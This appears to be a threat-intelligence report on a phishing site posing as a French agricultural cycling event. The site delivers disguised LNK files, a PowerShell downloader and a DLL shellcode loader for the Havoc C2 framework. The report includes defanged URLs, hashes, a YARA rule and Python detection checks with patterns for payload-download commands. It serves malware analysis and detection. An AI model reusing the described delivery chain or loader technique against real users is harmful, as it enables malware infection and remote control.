Key Takeaways
CRIL has identified a phishing site hosted at “wacc[.]photo” that is masquerading as the official website for the World Agricultural Cycling Competition. The TA responsible for this phishing site has cloned the legitimate website, making only minor alterations to its content. The real cycling event took place from June 7th to 9th, after which the TA launched their attack campaign.
The TA added a new section titled “PHOTO,” claiming to offer event photos to lure visitors. This addition appears to be a strategic move aimed at individuals associated with the event who might be eager to view or download these photos. The figure below illustrates the appearance of the phishing site.
The figure below illustrates the new section added by the TA, which offers the option to download a malicious ZIP file disguised as event photos.
The ZIP file in question contains three shortcut files (.lnk) that are disguised as images. When a user clicks on any of these shortcuts, a PowerShell script is executed. This script is designed to download legitimate images and display them using the Edge browser, thereby maintaining the illusion of authenticity. However, the script also downloads and executes a malicious DLL file in the background.
This DLL acts as a loader and loads shellcode that is responsible for loading the Havoc C2. Havoc is a sophisticated post-exploitation Command and Control (C&C) framework. Once deployed, the Havoc C2 attempts to connect to an Azure Front Door domain, which the TA likely uses as a redirector to the actual C&C server. During the analysis, it was observed that the C&C server was down, which hindered the ability to fully analyze the subsequent stages of the attack.
This phishing site also hosts an open directory containing various malware payloads used to deliver Havoc. The TA may be swapping out payloads to better target their victims.
The initial infection begins when a user downloads a ZIP file from a phishing site. This ZIP file contains three shortcut files disguised with .jpg extensions to appear as image files, as depicted in the figure below.
Each of these shortcut files is designed to execute the same operation. Upon execution, they use conhost.exe to run a PowerShell script. This script initially downloads a legitimate JPG file using the Start-BitsTransfer cmdlet, which serves as a decoy. Specifically:
These decoy images are placed in the “AppData\Local” directory. Subsequently, the script uses Microsoft Edge to open these images with the following command:
The figure below shows the decoy image.
The PowerShell script for downloading and displaying the decoy images is illustrated in the figure below.
After this, the PowerShell script downloads a DLL file from “hxxps[:]//wacc.photo/wp-content/uploads/2024/KB.crdownload” and saves it in the Downloads folder as “KB.part.” It then moves this file to “AppData\Local,” renames it “KB.DLL,” and runs the Unblock-File cmdlet to allow the downloaded file to be executed. The figure below shows the PowerShell script for downloading the DLL.
Now, this PowerShell script loads the “KB.DLL” into its process and then invokes the Run method within the DLL to initiate its execution. The figure below shows the code for loading the DLL file.
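Two detection checks for the chain described above (the image-style double-extension shortcuts inside the ZIP, and the Start-BitsTransfer / Move-Item / Unblock-File sequence in the PowerShell stage), written here as an added example rather than code from the report. The ZIP contents, paths and command lines are constructed stand-ins; the pattern names are hypothetical.

```python
import io
import re
import zipfile

# Image extensions the shortcuts imitate; the page's sample uses "N.jpg.lnk".
IMAGE_EXTS = (".jpg", ".jpeg", ".png", ".gif", ".bmp")

def masquerading_shortcuts(zip_bytes: bytes) -> list:
    """Return archive members that are .lnk files wearing an image-style
    double extension (T1036.008), e.g. '1.jpg.lnk'."""
    found = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            lower = name.lower()
            if lower.endswith(".lnk") and lower[:-4].endswith(IMAGE_EXTS):
                found.append(name)
    return found

# Behaviours the page describes for the PowerShell stage; each match is one hit.
PS_PATTERNS = {
    "bits_transfer": re.compile(r"start-bitstransfer", re.I),
    "unblock_file": re.compile(r"unblock-file", re.I),
    "crdownload_fetch": re.compile(r"\.crdownload\b", re.I),
    "part_rename": re.compile(r"move-item[^;]*\.part\b", re.I),
    "dll_in_appdata": re.compile(r"appdata\\local\\[^\s\"';]+\.dll", re.I),
}

def score_powershell(cmdline: str):
    """Return (score, matched behaviours); two or more hits warrant triage."""
    hits = [name for name, rx in PS_PATTERNS.items() if rx.search(cmdline)]
    return len(hits), hits

def build_sample_zip() -> bytes:
    """Constructed stand-in for the lure archive: three fake 'photos' plus a
    harmless text file (member contents are placeholders, not real shortcuts)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in ("1.jpg.lnk", "2.jpg.lnk", "3.jpg.lnk", "readme.txt"):
            zf.writestr(name, b"placeholder")
    return buf.getvalue()

# Constructed command lines: one mirrors the described chain, one is benign.
SAMPLE_CMD = (
    "Start-BitsTransfer -Source https://example.invalid/1.jpg "
    "-Destination C:\\Users\\u\\AppData\\Local\\1.jpg; "
    "Move-Item C:\\Users\\u\\Downloads\\KB.part C:\\Users\\u\\AppData\\Local\\KB.DLL; "
    "Unblock-File C:\\Users\\u\\AppData\\Local\\KB.DLL"
)
BENIGN_CMD = "Get-ChildItem C:\\Users\\u\\Downloads | Sort-Object LastWriteTime"
```

Feed `score_powershell` from PowerShell script-block or process-creation logs and `masquerading_shortcuts` from mail or web-proxy attachment captures; a single hit on its own (for example, Start-BitsTransfer in an admin script) is normal.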
This “KB.DLL” is a shellcode loader. It contains obfuscated shellcode and a dictionary of words mapped to bytes. A function named DecodeWordsToBytes() reverses this data, converting the words back into their original byte values.
After de-obfuscating the shellcode, the ExecuteShellcode() method is called to execute it. This method allocates executable memory, copies the shellcode into it, and then abuses the EnumFontsW() API to run the shellcode under the pretext of enumerating fonts: EnumFontsW() takes a callback function pointer, and the address of the shellcode is passed as that callback, so the API itself transfers execution to it. The method then cleans up by releasing the device context. This is a common technique used by malware to execute payloads while attempting to avoid detection. The shellcode contains an embedded executable, as shown in the figure below.
This shellcode, upon execution, searches for the PE header as depicted in the figure below. Embedded within the shellcode is a Havoc C2 agent, which is loaded and designed to establish a connection to the domain egzklpzltbptmgnnevne[.]azurefd.net. This domain belongs to Azure Front Door, a content delivery network (CDN) service offered by Microsoft Azure. TAs have previously been observed abusing similar legitimate services to evade detection. At the time of analysis, this domain was down, which prevented further investigation of subsequent stages.
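A small network-log triage routine for the redirector behaviour described above, added here as an example (not code from the report): it flags the report's Front Door IoC outright and also flags any other *.azurefd.net endpoint that is contacted by a scripting host rather than a browser. The log line format and the sample lines are constructed for this example.

```python
import re
from collections import namedtuple

# IoC from this report (defanged on the page, written plainly here for matching).
IOC_DOMAINS = {"egzklpzltbptmgnnevne.azurefd.net"}
# Processes involved in the described chain; a Front Door endpoint reached
# directly from one of these, rather than a browser, is worth a look.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "conhost.exe"}

Event = namedtuple("Event", "ts process domain")

# Hypothetical line shape for the constructed log: "<ts> <process> -> <domain>"
LINE_RX = re.compile(r"^(\S+)\s+(\S+)\s+->\s+(\S+)$")

def parse_line(line: str):
    m = LINE_RX.match(line.strip())
    return Event(*m.groups()) if m else None

def classify(ev: Event):
    """Return a verdict string for a suspicious event, or None if unremarkable."""
    domain = ev.domain.lower()
    if domain in IOC_DOMAINS:
        return "known_ioc"
    if domain.endswith(".azurefd.net") and ev.process.lower() in SCRIPT_HOSTS:
        return "front_door_from_script_host"
    return None

def triage(lines):
    """Return (ts, process, domain, verdict) for every flagged line, in order."""
    flagged = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        verdict = classify(ev)
        if verdict:
            flagged.append((ev.ts, ev.process, ev.domain, verdict))
    return flagged

# Constructed sample: browser traffic (benign, including a legitimate Front Door
# site) and two PowerShell-originated connections that should fire.
SAMPLE_LOG = """
2024-06-10T09:01:02Z msedge.exe -> photos.example.invalid
2024-06-10T09:01:05Z msedge.exe -> cdn.example-static.invalid
2024-06-10T09:01:09Z powershell.exe -> egzklpzltbptmgnnevne.azurefd.net
2024-06-10T09:02:11Z powershell.exe -> otherendpoint.azurefd.net
2024-06-10T09:03:00Z msedge.exe -> something.azurefd.net
"""
```

The second rule will also match legitimate automation that talks to a Front Door-fronted API from PowerShell, so treat it as a hunting lead to be baselined per environment, not a block rule.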
This attack seems to have been deliberately aimed at the French agricultural sector. Although the command and control (C&C) server was inactive during the analysis, preventing a complete understanding of the threat actor’s objectives, there are several potential implications based on the infection chain that was observed.
The deployment of Havoc indicates that the TA likely intended to carry out extensive and sophisticated operations. Havoc, as a post-exploitation framework, is capable of enabling a range of malicious activities. These could include lateral movement within the compromised network, allowing the attacker to reach additional systems; establishing persistence to ensure long-term access; and deploying further malware payloads to deepen the compromise or achieve specific goals. The sophistication of the Havoc framework suggests that the attacker was well-prepared and potentially had a strategic interest in compromising systems within the French agricultural industry.
| Tactic | Technique | Procedure |
|---|---|---|
| Initial Access (TA0001) | Phishing (T1566) | Uses a phishing website. |
| Execution (TA0002) | User Execution: Malicious File (T1204.002) | The user executes a .LNK file disguised as an image. |
| Execution (TA0002) | Command and Scripting Interpreter: PowerShell (T1059.001) | Embedded PowerShell commands are executed. |
| Defense Evasion (TA0005) | Masquerading: Masquerade File Type (T1036.008) | LNK file disguised as a JPG file. |
| Defense Evasion (TA0005) | Obfuscated Files or Information (T1027) | Contains obfuscated shellcode. |
| Command and Control (TA0011) | Application Layer Protocol: Web Protocols (T1071.001) | Uses HTTP to communicate. |
| Indicators | Indicator Type | Description |
|---|---|---|
| 7566a8bce13dcbf1137b44776711ac2c471cf54a8bd7891c5b00b091f2aaa796 | SHA256 | GAGNANTS_CONCOURS_2024.zip |
| da9122c56c0da8f4e336f811435783b22994a9109162f3be6558aed7ac1c08da | SHA256 | 1.jpg.lnk |
| 3a169ce08fa1ab70f452c2bdfe3638805579a5cca1b45eb8ce81f68c98c932da | SHA256 | 2.jpg.lnk |
| 43cfef5db47162dda0c11320d3fcee76ef83308a7d0b7c9afd16c8dd974834a7 | SHA256 | 3.jpg.lnk |
| d9b4ed0f77045b79989b31fa32fdb1b461e9602d0c150a4052f9ae6a79a98ff5 | SHA256 | KB.dll |
```yara
rule Loader_Havoc
{
    meta:
        author = "Cyble Research and Intelligence Labs"
        description = "Detects DLL loader used to deliver Havoc payload"
        date = "2024-08-14"
        os = "Windows"
    strings:
        // Method name of the loader and the GDI APIs it uses for the
        // EnumFontsW callback execution trick
        $a1 = "ExecuteShellcode" fullword ascii
        $a2 = "GetDCEx" fullword ascii
        $a3 = "EnumFontsW" fullword ascii
        $a4 = "ReleaseDC" fullword ascii
    condition:
        // MZ header plus all four strings
        uint16(0) == 0x5A4D and all of them
}
```